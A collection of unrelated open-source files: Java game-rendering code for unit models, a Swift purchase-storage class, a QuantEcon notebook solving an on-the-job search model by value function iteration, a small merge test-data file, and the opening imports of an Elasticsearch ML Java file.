FieldComp comp = actor.getComp();
// save the unitid in the userdata
// TODO, may be set once in the spatial creation
s.setUserData(ENTITYID_USERDATA, comp.getId());
// translation
s.setLocalTranslation(TranslateUtil.toVector3f(actor.getPos()));
// rotation
Quaternion r = new Quaternion();
if (comp.getDirection() != null) {
Point3D pu = comp.getUpDirection();
Point3D pv = comp.getDirection();
if (pu != null) {
// the comp has an up vector
// for ground comps or horizontally flying units
Vector3f u = TranslateUtil.toVector3f(pu).normalize();
Vector3f v = TranslateUtil.toVector3f(pv).normalize();
r.lookAt(v, u);
// we correct the pitch of the unit because the direction is always flattened;
// this is only to follow the terrain relief
double angle = Math.acos(pu.getDotProduct(pv) / (pu.getNorm() * pv.getNorm()));
r = r.mult(new Quaternion().fromAngles((float) (-angle+AngleUtil.RIGHT+actor.getPitchFix()), (float) (actor.getRollFix()), (float) (actor.getYawFix())));
} else {
// the comp hasn't any up vector
// for projectiles
Vector3f u = new Vector3f(0, -1, 0);
Vector3f v = TranslateUtil.toVector3f(pv).normalize();
float real = 1 + u.dot(v);
Vector3f w = u.cross(v);
r = new Quaternion(w.x, w.y, w.z, real).normalizeLocal();
}
}
s.setLocalRotation(r);
if (actor.getComp() instanceof Unit) {
drawAsUnit(actor);
} else if (actor.getComp() instanceof Projectile) {
drawAsProjectile(actor);
} else if (actor.getComp() instanceof Trinket) {
drawAsTrinket(actor);
}
}
protected void drawAsUnit(ModelActor actor) {
orientTurret(actor);
updateBoneCoords(actor);
drawSelectionCircle(actor);
}
protected void drawAsProjectile(ModelActor actor) {
updateBoneCoords(actor);
}
protected void drawAsTrinket(ModelActor actor) {
}
private void drawSelectionCircle(ModelActor actor) {
Unit unit = (Unit) actor.getComp();
if (actor.getViewElements().selectionCircle == null) {
Geometry g = new Geometry();
g.setMesh(new Circle((float) unit.getRadius(), 10));
g.setMaterial(MaterialManager.greenMaterial);
g.rotate((float) AngleUtil.RIGHT, 0, 0);
Node n = new Node();
n.attachChild(g);
actor.getViewElements().selectionCircle = n;
}
Node n = actor.getViewElements().selectionCircle;
n.setLocalTranslation(TranslateUtil.toVector3f(actor.getPos().getAddition(0, 0, 0.2)));
if (unit.selected) {
if (!actorDrawer.mainNode.hasChild(n)) {
actorDrawer.mainNode.attachChild(n);
}
} else if (actorDrawer.mainNode.hasChild(n)) {
actorDrawer.mainNode.detachChild(n);
}
}
private void orientTurret(ModelActor actor) {
for (Turret t : ((Unit) actor.getComp()).getTurrets()) {
Bone turretBone = actor.getViewElements().spatial.getControl(AnimControl.class).getSkeleton().getBone(t.boneName);
if (turretBone == null) {
throw new RuntimeException("Can't find the bone " + t.boneName + " for turret.");
}
// Vector3f axis;
// switch (t.boneAxis){
// case "X" : axis = Vector3f.UNIT_X; break;
// case "Y" : axis = Vector3f.UNIT_Y; break;
// case "Z" : axis = Vector3f.UNIT_Z; break;
// default : throw new IllegalArgumentException("Wrong bone axis for "+((Unit)actor.getComp()).builderID+" : "+t.boneAxis);
// }
// Quaternion r = new Quaternion().fromAngleAxis((float) t.yaw, axis);
Quaternion r = new Quaternion().fromAngleAxis((float) t.yaw, Vector3f.UNIT_Y);
turretBone.setUserControl(true);
turretBone.setUserTransforms(Vector3f.ZERO, r, Vector3f.UNIT_XYZ);
}
}
private void updateBoneCoords(ModelActor actor) {
AnimControl ctrl = actor.getViewElements().spatial.getControl(AnimControl.class);
if(ctrl == null) {
return;
}
Skeleton sk = ctrl.getSkeleton();
for (int i = 0; i < sk.getBoneCount(); i++) {
Bone b = sk.getBone(i);
actor.setBone(b.getName(), getBoneWorldPos(actor, i));
}
}
private Point3D getBoneWorldPos(ModelActor actor, String boneName) {
return getBoneWorldPos(actor, actor.getPos(), actor.getYaw(), boneName);
}
private Point3D getBoneWorldPos(ModelActor actor, int boneIndex) {
return getBoneWorldPos(actor, actor.getViewElements().spatial.getControl(AnimControl.class).getSkeleton().getBone(boneIndex).getName());
}
private Point3D getBoneWorldPos(ModelActor actor, Point3D actorPos, double actorYaw, String boneName) {
Spatial s = actor.getViewElements().spatial;
Vector3f modelSpacePos = s.getControl(AnimControl.class).getSkeleton().getBone(boneName).getModelSpacePosition();
Quaternion q = actor.getViewElements().spatial.getLocalRotation();
modelSpacePos = q.mult(modelSpacePos);
modelSpacePos.multLocal(s.getLocalScale());
modelSpacePos = modelSpacePos.add(s.getLocalTranslation());
// float scale
// Point2D p2D = Translator.toPoint2D(modelSpacePos);
// p2D = p2D.getRotation(actorYaw+Angle.RIGHT);
// Point3D p3D = new Point3D(p2D.getMult(DEFAULT_SCALE), modelSpacePos.z*DEFAULT_SCALE, 1);
// p3D = p3D.getAddition(actorPos);
// return p3D;
return TranslateUtil.toPoint3D(modelSpacePos);
}
}
| {
"pile_set_name": "Github"
} |
package com.gxk.jvm.classfile;
public class Attributes {
public final Attribute[] attributes;
public Attributes(int size) {
this.attributes = new Attribute[size];
}
}
| {
"pile_set_name": "Github"
} |
import Foundation
public final class UserDefaultsPurchaseStorage : PurchaseStorage {
private let defaults: UserDefaults
public init(defaults: UserDefaults = .standard) {
self.defaults = defaults
}
private let storageKeyPrefix: String = "purchaseStorage"
public func record(forProductIdentifier productIdentifier: String) -> PurchaseRecord? {
let storageKey = self.storageKey(forProductIdentifier: productIdentifier)
guard let dict = self.defaults.dictionary(forKey: storageKey) else { return nil }
return PurchaseRecord(from: dict)
}
public func save(_ record: PurchaseRecord) -> PurchaseStorageUpdateResult {
let previousRecord = self.record(forProductIdentifier: record.productIdentifier)
guard record != previousRecord else {
return .noChanges
}
let key = self.storageKey(forProductIdentifier: record.productIdentifier)
let dict = record.dictionaryRepresentation
self.defaults.set(dict, forKey: key)
return .didChangeRecords
}
public func removeRecord(forProductIdentifier productIdentifier: String) -> PurchaseStorageUpdateResult {
let key = self.storageKey(forProductIdentifier: productIdentifier)
if self.defaults.object(forKey: key) != nil {
self.defaults.set(nil, forKey: key)
return .didChangeRecords
}
return .noChanges
}
private func storageKey(forProductIdentifier productIdentifier: String) -> String {
return self.storageKeyPrefix + "." + productIdentifier
}
}
| {
"pile_set_name": "Github"
} |
{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"\n",
"<a id='jv'></a>\n",
"<div id=\"qe-notebook-header\" align=\"right\" style=\"text-align:right;\">\n",
" <a href=\"https://quantecon.org/\" title=\"quantecon.org\">\n",
" <img style=\"width:250px;display:inline;\" width=\"250px\" src=\"https://assets.quantecon.org/img/qe-menubar-logo.svg\" alt=\"QuantEcon\">\n",
" </a>\n",
"</div>"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# Job Search VII: On-the-Job Search\n",
"\n",
"\n",
"<a id='index-1'></a>"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Contents\n",
"\n",
"- [Job Search VII: On-the-Job Search](#Job-Search-VII:-On-the-Job-Search) \n",
" - [Overview](#Overview) \n",
" - [Model](#Model) \n",
" - [Implementation](#Implementation) \n",
" - [Solving for Policies](#Solving-for-Policies) \n",
" - [Exercises](#Exercises) \n",
" - [Solutions](#Solutions) "
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"In addition to what’s in Anaconda, this lecture will need the following libraries:"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": true
},
"outputs": [],
"source": [
"!pip install --upgrade quantecon\n",
"!pip install interpolation"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Overview\n",
"\n",
"In this section, we solve a simple on-the-job search model\n",
"\n",
"- based on [[LS18]](https://python.quantecon.org/zreferences.html#ljungqvist2012), exercise 6.18, and [[Jov79]](https://python.quantecon.org/zreferences.html#jovanovic1979) \n",
"\n",
"\n",
"Let’s start with some imports:"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"import numpy as np\n",
"import scipy.stats as stats\n",
"from interpolation import interp\n",
"from numba import njit, prange\n",
"import matplotlib.pyplot as plt\n",
"%matplotlib inline\n",
"from math import gamma"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Model Features\n",
"\n",
"\n",
"<a id='index-2'></a>\n",
"- job-specific human capital accumulation combined with on-the-job search \n",
"- infinite-horizon dynamic programming with one state variable and two controls "
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Model\n",
"\n",
"\n",
"<a id='index-3'></a>\n",
"Let $ x_t $ denote the time-$ t $ job-specific human capital of a worker employed at a given firm and let $ w_t $ denote current wages.\n",
"\n",
"Let $ w_t = x_t(1 - s_t - \\phi_t) $, where\n",
"\n",
"- $ \\phi_t $ is investment in job-specific human capital for the current role and \n",
"- $ s_t $ is search effort, devoted to obtaining new offers from other firms. \n",
"\n",
"\n",
"For as long as the worker remains in the current job, evolution of $ \\{x_t\\} $ is given by $ x_{t+1} = g(x_t, \\phi_t) $.\n",
"\n",
"When search effort at $ t $ is $ s_t $, the worker receives a new job offer with probability $ \\pi(s_t) \\in [0, 1] $.\n",
"\n",
"The value of the offer, measured in job-specific human capital, is $ u_{t+1} $, where $ \\{u_t\\} $ is IID with common distribution $ f $.\n",
"\n",
"The worker can reject the current offer and continue with existing job.\n",
"\n",
"Hence $ x_{t+1} = u_{t+1} $ if he/she accepts and $ x_{t+1} = g(x_t, \\phi_t) $ otherwise.\n",
"\n",
"Let $ b_{t+1} \\in \\{0,1\\} $ be a binary random variable, where $ b_{t+1} = 1 $ indicates that the worker receives an offer at the end of time $ t $.\n",
"\n",
"We can write\n",
"\n",
"\n",
"<a id='equation-jd'></a>\n",
"$$\n",
"x_{t+1}\n",
"= (1 - b_{t+1}) g(x_t, \\phi_t) + b_{t+1}\n",
" \\max \\{ g(x_t, \\phi_t), u_{t+1}\\} \\tag{1}\n",
"$$\n",
"\n",
"Agent’s objective: maximize expected discounted sum of wages via controls $ \\{s_t\\} $ and $ \\{\\phi_t\\} $.\n",
"\n",
"Taking the expectation of $ v(x_{t+1}) $ and using [(1)](#equation-jd),\n",
"the Bellman equation for this problem can be written as\n",
"\n",
"\n",
"<a id='equation-jvbell'></a>\n",
"$$\n",
"v(x)\n",
"= \\max_{s + \\phi \\leq 1}\n",
" \\left\\{\n",
" x (1 - s - \\phi) + \\beta (1 - \\pi(s)) v[g(x, \\phi)] +\n",
" \\beta \\pi(s) \\int v[g(x, \\phi) \\vee u] f(du)\n",
" \\right\\} \\tag{2}\n",
"$$\n",
"\n",
"Here nonnegativity of $ s $ and $ \\phi $ is understood, while\n",
"$ a \\vee b := \\max\\{a, b\\} $."
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Parameterization\n",
"\n",
"\n",
"<a id='index-4'></a>\n",
"In the implementation below, we will focus on the parameterization\n",
"\n",
"$$\n",
"g(x, \\phi) = A (x \\phi)^{\\alpha},\n",
"\\quad\n",
"\\pi(s) = \\sqrt s\n",
"\\quad \\text{and} \\quad\n",
"f = \\text{Beta}(2, 2)\n",
"$$\n",
"\n",
"with default parameter values\n",
"\n",
"- $ A = 1.4 $ \n",
"- $ \\alpha = 0.6 $ \n",
"- $ \\beta = 0.96 $ \n",
"\n",
"\n",
"The $ \\text{Beta}(2,2) $ distribution is supported on $ (0,1) $ - it has a unimodal, symmetric density peaked at 0.5.\n",
"\n",
"\n",
"<a id='jvboecalc'></a>"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Back-of-the-Envelope Calculations\n",
"\n",
"Before we solve the model, let’s make some quick calculations that\n",
"provide intuition on what the solution should look like.\n",
"\n",
"To begin, observe that the worker has two instruments to build\n",
"capital and hence wages:\n",
"\n",
"1. invest in capital specific to the current job via $ \\phi $ \n",
"1. search for a new job with better job-specific capital match via $ s $ \n",
"\n",
"\n",
"Since wages are $ x (1 - s - \\phi) $, marginal cost of investment via either $ \\phi $ or $ s $ is identical.\n",
"\n",
"Our risk-neutral worker should focus on whatever instrument has the highest expected return.\n",
"\n",
"The relative expected return will depend on $ x $.\n",
"\n",
"For example, suppose first that $ x = 0.05 $\n",
"\n",
"- If $ s=1 $ and $ \\phi = 0 $, then since $ g(x,\\phi) = 0 $,\n",
" taking expectations of [(1)](#equation-jd) gives expected next period capital equal to $ \\pi(s) \\mathbb{E} u\n",
" = \\mathbb{E} u = 0.5 $. \n",
"- If $ s=0 $ and $ \\phi=1 $, then next period capital is $ g(x, \\phi) = g(0.05, 1) \\approx 0.23 $. \n",
"\n",
"\n",
"Both rates of return are good, but the return from search is better.\n",
"\n",
"Next, suppose that $ x = 0.4 $\n",
"\n",
"- If $ s=1 $ and $ \\phi = 0 $, then expected next period capital is again $ 0.5 $ \n",
"- If $ s=0 $ and $ \\phi = 1 $, then $ g(x, \\phi) = g(0.4, 1) \\approx 0.8 $ \n",
"\n",
"\n",
"Return from investment via $ \\phi $ dominates expected return from search.\n",
"\n",
"Combining these observations gives us two informal predictions:\n",
"\n",
"1. At any given state $ x $, the two controls $ \\phi $ and $ s $ will\n",
" function primarily as substitutes — worker will focus on whichever instrument has the higher expected return. \n",
"1. For sufficiently small $ x $, search will be preferable to investment in\n",
" job-specific human capital. For larger $ x $, the reverse will be true. \n",
"\n",
"\n",
"Now let’s turn to implementation, and see if we can match our predictions."
]
},
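  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "As a quick sanity check, we can evaluate the transition function\n",
    "$ g(x, \\phi) = A (x \\phi)^{\\alpha} $ from the parameterization above at the\n",
    "default parameters $ A = 1.4 $ and $ \\alpha = 0.6 $ to reproduce the two\n",
    "numbers just quoted:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {
    "hide-output": false
   },
   "outputs": [],
   "source": [
    "A, α = 1.4, 0.6\n",
    "g = lambda x, ϕ: A * (x * ϕ)**α\n",
    "\n",
    "print(g(0.05, 1))  # ≈ 0.23, next period capital from full investment at x = 0.05\n",
    "print(g(0.4, 1))   # ≈ 0.8, next period capital from full investment at x = 0.4"
   ]
  },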
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Implementation\n",
"\n",
"\n",
"<a id='index-5'></a>\n",
"We will set up a class `JVWorker` that holds the parameters of the model described above"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"class JVWorker:\n",
" r\"\"\"\n",
" A Jovanovic-type model of employment with on-the-job search.\n",
"\n",
" \"\"\"\n",
"\n",
" def __init__(self,\n",
" A=1.4,\n",
" α=0.6,\n",
" β=0.96, # Discount factor\n",
" π=np.sqrt, # Search effort function\n",
" a=2, # Parameter of f\n",
" b=2, # Parameter of f\n",
" grid_size=50,\n",
" mc_size=100,\n",
" ɛ=1e-4):\n",
"\n",
" self.A, self.α, self.β, self.π = A, α, β, π\n",
" self.mc_size, self.ɛ = mc_size, ɛ\n",
"\n",
" self.g = njit(lambda x, ϕ: A * (x * ϕ)**α) # Transition function\n",
" self.f_rvs = np.random.beta(a, b, mc_size)\n",
"\n",
" # Max of grid is the max of a large quantile value for f and the\n",
" # fixed point y = g(y, 1)\n",
" ɛ = 1e-4\n",
" grid_max = max(A**(1 / (1 - α)), stats.beta(a, b).ppf(1 - ɛ))\n",
"\n",
" # Human capital\n",
" self.x_grid = np.linspace(ɛ, grid_max, grid_size)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"The function `operator_factory` takes an instance of this class and returns a\n",
"jitted version of the Bellman operator `T`, ie.\n",
"\n",
"$$\n",
"Tv(x)\n",
"= \\max_{s + \\phi \\leq 1} w(s, \\phi)\n",
"$$\n",
"\n",
"where\n",
"\n",
"\n",
"<a id='equation-defw'></a>\n",
"$$\n",
"w(s, \\phi)\n",
" := x (1 - s - \\phi) + \\beta (1 - \\pi(s)) v[g(x, \\phi)] +\n",
" \\beta \\pi(s) \\int v[g(x, \\phi) \\vee u] f(du) \\tag{3}\n",
"$$\n",
"\n",
"When we represent $ v $, it will be with a NumPy array `v` giving values on grid `x_grid`.\n",
"\n",
"But to evaluate the right-hand side of [(3)](#equation-defw), we need a function, so\n",
"we replace the arrays `v` and `x_grid` with a function `v_func` that gives linear\n",
"interpolation of `v` on `x_grid`.\n",
"\n",
"Inside the `for` loop, for each `x` in the grid over the state space, we\n",
"set up the function $ w(z) = w(s, \\phi) $ defined in [(3)](#equation-defw).\n",
"\n",
"The function is maximized over all feasible $ (s, \\phi) $ pairs.\n",
"\n",
"Another function, `get_greedy` returns the optimal choice of $ s $ and $ \\phi $\n",
"at each $ x $, given a value function."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"def operator_factory(jv, parallel_flag=True):\n",
"\n",
" \"\"\"\n",
" Returns a jitted version of the Bellman operator T\n",
"\n",
" jv is an instance of JVWorker\n",
"\n",
" \"\"\"\n",
"\n",
" π, β = jv.π, jv.β\n",
" x_grid, ɛ, mc_size = jv.x_grid, jv.ɛ, jv.mc_size\n",
" f_rvs, g = jv.f_rvs, jv.g\n",
"\n",
" @njit\n",
" def objective(z, x, v):\n",
" s, ϕ = z\n",
" v_func = lambda x: interp(x_grid, v, x)\n",
"\n",
" integral = 0\n",
" for m in range(mc_size):\n",
" u = f_rvs[m]\n",
" integral += v_func(max(g(x, ϕ), u))\n",
" integral = integral / mc_size\n",
"\n",
" q = π(s) * integral + (1 - π(s)) * v_func(g(x, ϕ))\n",
" return x * (1 - ϕ - s) + β * q\n",
"\n",
" @njit(parallel=parallel_flag)\n",
" def T(v):\n",
" \"\"\"\n",
" The Bellman operator\n",
" \"\"\"\n",
"\n",
" v_new = np.empty_like(v)\n",
" for i in prange(len(x_grid)):\n",
" x = x_grid[i]\n",
"\n",
" # Search on a grid\n",
" search_grid = np.linspace(ɛ, 1, 15)\n",
" max_val = -1\n",
" for s in search_grid:\n",
" for ϕ in search_grid:\n",
" current_val = objective((s, ϕ), x, v) if s + ϕ <= 1 else -1\n",
" if current_val > max_val:\n",
" max_val = current_val\n",
" v_new[i] = max_val\n",
"\n",
" return v_new\n",
"\n",
" @njit\n",
" def get_greedy(v):\n",
" \"\"\"\n",
" Computes the v-greedy policy of a given function v\n",
" \"\"\"\n",
" s_policy, ϕ_policy = np.empty_like(v), np.empty_like(v)\n",
"\n",
" for i in range(len(x_grid)):\n",
" x = x_grid[i]\n",
" # Search on a grid\n",
" search_grid = np.linspace(ɛ, 1, 15)\n",
" max_val = -1\n",
" for s in search_grid:\n",
" for ϕ in search_grid:\n",
" current_val = objective((s, ϕ), x, v) if s + ϕ <= 1 else -1\n",
" if current_val > max_val:\n",
" max_val = current_val\n",
" max_s, max_ϕ = s, ϕ\n",
" s_policy[i], ϕ_policy[i] = max_s, max_ϕ\n",
" return s_policy, ϕ_policy\n",
"\n",
" return T, get_greedy"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"To solve the model, we will write a function that uses the Bellman operator\n",
"and iterates to find a fixed point."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"def solve_model(jv,\n",
" use_parallel=True,\n",
" tol=1e-4,\n",
" max_iter=1000,\n",
" verbose=True,\n",
" print_skip=25):\n",
"\n",
" \"\"\"\n",
" Solves the model by value function iteration\n",
"\n",
" * jv is an instance of JVWorker\n",
"\n",
" \"\"\"\n",
"\n",
" T, _ = operator_factory(jv, parallel_flag=use_parallel)\n",
"\n",
" # Set up loop\n",
" v = jv.x_grid * 0.5 # Initial condition\n",
" i = 0\n",
" error = tol + 1\n",
"\n",
" while i < max_iter and error > tol:\n",
" v_new = T(v)\n",
" error = np.max(np.abs(v - v_new))\n",
" i += 1\n",
" if verbose and i % print_skip == 0:\n",
" print(f\"Error at iteration {i} is {error}.\")\n",
" v = v_new\n",
"\n",
" if i == max_iter:\n",
" print(\"Failed to converge!\")\n",
"\n",
" if verbose and i < max_iter:\n",
" print(f\"\\nConverged in {i} iterations.\")\n",
"\n",
" return v_new"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Solving for Policies\n",
"\n",
"\n",
"<a id='index-6'></a>\n",
"Let’s generate the optimal policies and see what they look like.\n",
"\n",
"\n",
"<a id='jv-policies'></a>"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"jv = JVWorker()\n",
"T, get_greedy = operator_factory(jv)\n",
"v_star = solve_model(jv)\n",
"s_star, ϕ_star = get_greedy(v_star)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"Here are the plots:"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"plots = [s_star, ϕ_star, v_star]\n",
"titles = [\"s policy\", \"ϕ policy\", \"value function\"]\n",
"\n",
"fig, axes = plt.subplots(3, 1, figsize=(12, 12))\n",
"\n",
"for ax, plot, title in zip(axes, plots, titles):\n",
" ax.plot(jv.x_grid, plot)\n",
" ax.set(title=title)\n",
" ax.grid()\n",
"\n",
"axes[-1].set_xlabel(\"x\")\n",
"plt.show()"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"The horizontal axis is the state $ x $, while the vertical axis gives $ s(x) $ and $ \\phi(x) $.\n",
"\n",
"Overall, the policies match well with our predictions from [above](#jvboecalc)\n",
"\n",
"- Worker switches from one investment strategy to the other depending on relative return. \n",
"- For low values of $ x $, the best option is to search for a new job. \n",
"- Once $ x $ is larger, worker does better by investing in human capital specific to the current position. "
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Exercises\n",
"\n",
"\n",
"<a id='jv-ex1'></a>"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Exercise 1\n",
"\n",
"Let’s look at the dynamics for the state process $ \\{x_t\\} $ associated with these policies.\n",
"\n",
"The dynamics are given by [(1)](#equation-jd) when $ \\phi_t $ and $ s_t $ are\n",
"chosen according to the optimal policies, and $ \\mathbb{P}\\{b_{t+1} = 1\\}\n",
"= \\pi(s_t) $.\n",
"\n",
"Since the dynamics are random, analysis is a bit subtle.\n",
"\n",
"One way to do it is to plot, for each $ x $ in a relatively fine grid\n",
"called `plot_grid`, a\n",
"large number $ K $ of realizations of $ x_{t+1} $ given $ x_t =\n",
"x $.\n",
"\n",
"Plot this with one dot for each realization, in the form of a 45 degree\n",
"diagram, setting"
]
},
{
"cell_type": "markdown",
"metadata": {
"hide-output": false
},
"source": [
"```python3\n",
"jv = JVWorker(grid_size=25, mc_size=50)\n",
"plot_grid_max, plot_grid_size = 1.2, 100\n",
"plot_grid = np.linspace(0, plot_grid_max, plot_grid_size)\n",
"fig, ax = plt.subplots()\n",
"ax.set_xlim(0, plot_grid_max)\n",
"ax.set_ylim(0, plot_grid_max)\n",
"```\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"By examining the plot, argue that under the optimal policies, the state\n",
"$ x_t $ will converge to a constant value $ \\bar x $ close to unity.\n",
"\n",
"Argue that at the steady state, $ s_t \\approx 0 $ and $ \\phi_t \\approx 0.6 $.\n",
"\n",
"\n",
"<a id='jv-ex2'></a>"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Exercise 2\n",
"\n",
"In the preceding exercise, we found that $ s_t $ converges to zero\n",
"and $ \\phi_t $ converges to about 0.6.\n",
"\n",
"Since these results were calculated at a value of $ \\beta $ close to\n",
"one, let’s compare them to the best choice for an *infinitely* patient worker.\n",
"\n",
"Intuitively, an infinitely patient worker would like to maximize steady state\n",
"wages, which are a function of steady state capital.\n",
"\n",
"You can take it as given—it’s certainly true—that the infinitely patient worker does not\n",
"search in the long run (i.e., $ s_t = 0 $ for large $ t $).\n",
"\n",
"Thus, given $ \\phi $, steady state capital is the positive fixed point\n",
"$ x^*(\\phi) $ of the map $ x \\mapsto g(x, \\phi) $.\n",
"\n",
"Steady state wages can be written as $ w^*(\\phi) = x^*(\\phi) (1 - \\phi) $.\n",
"\n",
"Graph $ w^*(\\phi) $ with respect to $ \\phi $, and examine the best\n",
"choice of $ \\phi $.\n",
"\n",
"Can you give a rough interpretation for the value that you see?"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Solutions"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Exercise 1\n",
"\n",
"Here’s code to produce the 45 degree diagram"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"jv = JVWorker(grid_size=25, mc_size=50)\n",
"π, g, f_rvs, x_grid = jv.π, jv.g, jv.f_rvs, jv.x_grid\n",
"T, get_greedy = operator_factory(jv)\n",
"v_star = solve_model(jv, verbose=False)\n",
"s_policy, ϕ_policy = get_greedy(v_star)\n",
"\n",
"# Turn the policy function arrays into actual functions\n",
"s = lambda y: interp(x_grid, s_policy, y)\n",
"ϕ = lambda y: interp(x_grid, ϕ_policy, y)\n",
"\n",
"def h(x, b, u):\n",
" return (1 - b) * g(x, ϕ(x)) + b * max(g(x, ϕ(x)), u)\n",
"\n",
"\n",
"plot_grid_max, plot_grid_size = 1.2, 100\n",
"plot_grid = np.linspace(0, plot_grid_max, plot_grid_size)\n",
"fig, ax = plt.subplots(figsize=(8, 8))\n",
"ticks = (0.25, 0.5, 0.75, 1.0)\n",
"ax.set(xticks=ticks, yticks=ticks,\n",
" xlim=(0, plot_grid_max),\n",
" ylim=(0, plot_grid_max),\n",
" xlabel='$x_t$', ylabel='$x_{t+1}$')\n",
"\n",
"ax.plot(plot_grid, plot_grid, 'k--', alpha=0.6) # 45 degree line\n",
"for x in plot_grid:\n",
" for i in range(jv.mc_size):\n",
" b = 1 if np.random.uniform(0, 1) < π(s(x)) else 0\n",
" u = f_rvs[i]\n",
" y = h(x, b, u)\n",
" ax.plot(x, y, 'go', alpha=0.25)\n",
"\n",
"plt.show()"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"Looking at the dynamics, we can see that\n",
"\n",
"- If $ x_t $ is below about 0.2 the dynamics are random, but\n",
" $ x_{t+1} > x_t $ is very likely. \n",
"- As $ x_t $ increases the dynamics become deterministic, and\n",
" $ x_t $ converges to a steady state value close to 1. \n",
"\n",
"\n",
"Referring back to the figure [here](#jv-policies) we see that $ x_t \\approx 1 $ means that\n",
"$ s_t = s(x_t) \\approx 0 $ and\n",
"$ \\phi_t = \\phi(x_t) \\approx 0.6 $."
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Exercise 2\n",
"\n",
"The figure can be produced as follows"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"jv = JVWorker()\n",
"\n",
"def xbar(ϕ):\n",
" A, α = jv.A, jv.α\n",
" return (A * ϕ**α)**(1 / (1 - α))\n",
"\n",
"ϕ_grid = np.linspace(0, 1, 100)\n",
"fig, ax = plt.subplots(figsize=(9, 7))\n",
"ax.set(xlabel='$\\phi$')\n",
"ax.plot(ϕ_grid, [xbar(ϕ) * (1 - ϕ) for ϕ in ϕ_grid], label='$w^*(\\phi)$')\n",
"ax.legend()\n",
"\n",
"plt.show()"
]
},
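{
"cell_type": "markdown",
"metadata": {},
"source": [
"A quick sketch of where `xbar` comes from, assuming (as earlier in this lecture) that the law of motion is $ g(x, \\phi) = A (x \\phi)^{\\alpha} $.\n",
"\n",
"A positive fixed point of $ x \\mapsto g(x, \\phi) $ solves $ x = A (x \\phi)^{\\alpha} $, so that $ x^{1-\\alpha} = A \\phi^{\\alpha} $ and hence\n",
"\n",
"$$ x^*(\\phi) = (A \\phi^{\\alpha})^{1/(1-\\alpha)} $$\n",
"\n",
"which is the expression implemented by `xbar` above."
]
},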
{
"cell_type": "markdown",
"metadata": {},
"source": [
"Observe that the maximizer is around 0.6.\n",
"\n",
"This is similar to the long-run value for $ \\phi $ obtained in\n",
"exercise 1.\n",
"\n",
"Hence the behavior of the infinitely patent worker is similar to that\n",
"of the worker with $ \\beta = 0.96 $.\n",
"\n",
"This seems reasonable and helps us confirm that our dynamic programming\n",
"solutions are probably correct."
]
}
],
"metadata": {
"date": 1584334741.697839,
"filename": "jv.rst",
"kernelspec": {
"display_name": "Python",
"language": "python3",
"name": "python3"
},
"title": "Job Search VII: On-the-Job Search"
},
"nbformat": 4,
"nbformat_minor": 2
} | {
"pile_set_name": "Github"
} |
are_mergeable 0 0 FALSE
are_mergeable 0 2 FALSE
are_mergeable 0 1 TRUE
are_mergeable 1 0 TRUE
#
are_mergeable 4 4 FALSE
are_mergeable 4 6 FALSE
are_mergeable 4 5 TRUE
are_mergeable 5 4 TRUE
#
merge 4 5 7
#
are_mergeable 8 9 FALSE
are_mergeable 8 10 FALSE
are_mergeable 8 11 FALSE
are_mergeable 9 12 FALSE
are_mergeable 9 13 FALSE
are_mergeable 11 13 FALSE
are_mergeable 10 13 FALSE
are_mergeable 11 12 FALSE
are_mergeable 10 12 FALSE
are_mergeable 10 11 TRUE
are_mergeable 12 13 TRUE
merge 10 11 8
merge 12 13 9
merge 14 15 8
merge 16 17 9
| {
"pile_set_name": "Github"
} |
/*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License;
* you may not use this file except in compliance with the Elastic License.
*/
package org.elasticsearch.xpack.ml;
import org.elasticsearch.action.ActionListener;
import org.elasticsearch.action.ActionRequest;
import org.elasticsearch.action.ActionResponse;
import org.elasticsearch.action.support.ActionFilters;
import org.elasticsearch.action.support.TransportAction;
import org.elasticsearch.common.breaker.NoopCircuitBreaker;
import org.elasticsearch.common.inject.Inject;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.license.LicenseService;
import org.elasticsearch.license.XPackLicenseState;
import org.elasticsearch.plugins.ActionPlugin;
import org.elasticsearch.plugins.Plugin;
import org.elasticsearch.tasks.Task;
import org.elasticsearch.transport.TransportService;
